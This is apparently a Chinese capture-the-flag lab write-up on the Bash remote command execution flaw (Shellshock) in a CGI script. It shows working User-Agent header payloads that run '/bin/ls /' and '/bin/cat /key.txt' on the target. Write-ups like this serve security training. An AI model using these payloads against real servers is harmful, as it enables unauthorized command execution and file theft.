0x00.题目描述:
背景介绍
安全工程师"墨者"对一单位业务系统进行授权测试,在测试过程中,发现存在bash命令执行漏洞。
实训目标
1、了解bash;
2、了解Bash远程命令执行漏洞形成原因;
3、了解Bash远程命令执行漏洞利用方法;
解题方向
找到poc.cgi文件
0x01.题目分析:
根据题目说明,在网上对Bash远程命令执行漏洞进行了一番学习。
参考连接
freebuf:https://www.freebuf.com/vuls/44994.html
Seebug:https://www.seebug.org/vuldb/ssvid-88877
0x02.解题过程
通过网上的资料搜查,发现此漏洞存在的路径多数在网页/cgi-bin/下,结合题目给的提示,打开http://url/cgi-bin/poc.cgi
构造执行语句插入到请求头的User-Agent头里面
User-Agent: () { :;}; echo; /bin/ls /
然后构造执行语句查看key.txt
User-Agent: () { :;}; echo; /bin/cat /key.txt
